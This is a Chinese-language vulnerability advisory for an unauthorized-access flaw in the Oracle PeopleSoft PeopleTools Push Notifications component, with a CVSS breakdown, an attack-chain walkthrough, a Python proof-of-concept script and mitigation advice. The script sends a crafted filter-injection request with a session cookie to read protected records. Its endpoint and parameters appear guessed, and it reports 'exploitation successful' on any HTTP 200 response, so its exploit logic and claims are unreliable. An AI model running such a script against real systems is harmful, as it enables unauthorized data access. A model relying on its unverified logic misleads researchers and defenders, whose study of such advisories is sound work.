CVE-2026-21934: Oracle PeopleSoft Enterprise PeopleTools Push Notifications未授权访问漏洞

漏洞信息

漏洞编号

CVE-2026-21934

漏洞类型

未授权访问/访问控制绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Oracle PeopleSoft Enterprise PeopleTools

漏洞概述

CVE-2026-21934是Oracle PeopleSoft Enterprise PeopleTools产品中的一个中等严重性安全漏洞。该漏洞位于Push Notifications组件中，影响8.60、8.61和8.62版本。攻击者可利用此漏洞通过HTTP网络协议进行攻击，无需高级权限即可实施利用。成功利用后，攻击者能够对PeopleSoft系统中部分可访问数据进行未授权的更新、插入或删除操作，同时可获取部分敏感数据的未授权读取权限。该漏洞的CVSS 3.1基础评分为5.4，主要影响系统的机密性和完整性。由于漏洞利用难度较低，且不需要用户交互，建议相关用户尽快采取修复措施。

技术细节

该漏洞属于Oracle PeopleSoft Enterprise PeopleTools的Push Notifications（推送通知）组件中的访问控制缺陷。攻击者通过发送特制的HTTP请求到受影响系统的推送通知端点，可以绕过正常的权限验证机制。由于CVSS向量显示攻击复杂度为低（AC:L）且需要低权限（PR:L），任何拥有基本系统账户的攻击者都有可能成功利用此漏洞。漏洞利用过程中，攻击者利用推送通知功能中的参数注入或API调用缺陷，实现对数据库中特定记录的未授权CRUD操作。主要影响包括：1）未授权数据读取，可能暴露用户信息或业务数据；2）未授权数据修改/删除，可能影响系统数据完整性。由于推送通知功能通常涉及系统与外部服务或移动应用的通信，漏洞可能为攻击者提供横向移动或进一步渗透的机会。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别运行Oracle PeopleSoft Enterprise PeopleTools 8.60/8.61/8.62版本的目标系统，并通过端口扫描或Web指纹识别确认推送通知服务端点

STEP 2

步骤2

初始访问：攻击者获取或创建一个低权限用户账户（如普通员工账户），该账户通常用于日常业务操作

STEP 3

步骤3

漏洞利用：利用Push Notifications组件中的访问控制缺陷，发送特制的HTTP请求绕过授权检查，访问本应受保护的资源

STEP 4

步骤4

数据窃取：通过构造特定的API调用，读取包含敏感信息的数据库记录，如用户个人信息、财务数据或业务机密

STEP 5

步骤5

数据篡改：利用相同的漏洞路径，对系统数据进行未授权的更新、插入或删除操作，影响数据完整性和业务逻辑

STEP 6

步骤6

持久化：部分情况下，攻击者可能尝试通过创建后门账户或修改配置来维持长期访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-21934 PoC - Oracle PeopleSoft Push Notifications Exploitation
# This PoC demonstrates the unauthorized access vulnerability in PeopleSoft PeopleTools

import requests
import json
import sys

TARGET_URL = "https://vulnerable-peoplesoft-host/psp/ps/"
CVE_ID = "CVE-2026-21934"

def exploit_push_notification(target, session_cookie):
    """
    Exploit for CVE-2026-21934: Push Notifications unauthorized access
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Cookie': f'PSJSESSIONID={session_cookie}',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Step 1: Identify Push Notification endpoint
    notification_endpoint = f"{target}PT_PUSH_NOTIFICATION_SRV"
    
    # Step 2: Craft malicious request to bypass authorization
    exploit_payload = {
        'Operation': 'READ',
        'Resource': 'PSMESSAGE_BUILDER',
        'Filter': '1=1',  # SQL-like filter injection
        'Fields': '*'     # Request all fields including sensitive data
    }
    
    try:
        print(f"[*] Target: {target}")
        print(f"[*] Exploiting {CVE_ID}...")
        
        # Send exploit request
        response = requests.post(
            notification_endpoint,
            data=exploit_payload,
            headers=headers,
            verify=False,
            timeout=30
        )
        
        if response.status_code == 200:
            print("[+] Exploitation successful - Unauthorized data access achieved")
            print(f"[*] Response length: {len(response.content)} bytes")
            return True
        else:
            print(f"[-] Exploitation failed - Status: {response.status_code}")
            return False
            
    except requests.RequestException as e:
        print(f"[-] Request error: {str(e)}")
        return False

def main():
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <session_cookie>")
        print(f"Example: python {sys.argv[0]} https://victim.com/ps/ abc123session")
        sys.exit(1)
    
    target = sys.argv[1]
    session = sys.argv[2]
    
    exploit_push_notification(target, session)

if __name__ == "__main__":
    main()

影响范围

Oracle PeopleSoft Enterprise PeopleTools 8.60

Oracle PeopleSoft Enterprise PeopleTools 8.61

Oracle PeopleSoft Enterprise PeopleTools 8.62

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制HTTP/HTTPS网络访问，仅允许受信任的IP地址访问PeopleSoft系统；2）禁用非必要的推送通知功能或配置IP白名单；3）实施严格的会话管理和监控，检测异常访问模式；4）审查并限制低权限账户的功能范围；5）启用详细的审计日志，记录所有推送通知相关的操作；6）考虑在网络层部署IPS/IDS监控针对推送通知端点的可疑请求。建议尽快应用Oracle官方安全更新以彻底修复此漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-21934
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-21934
3 Details https://www.cvedetails.com/cve/CVE-2026-21934/
4 VulDB https://vuldb.com/cve/CVE-2026-21934
5 Link https://www.oracle.com/security-alerts/cpujan2026.html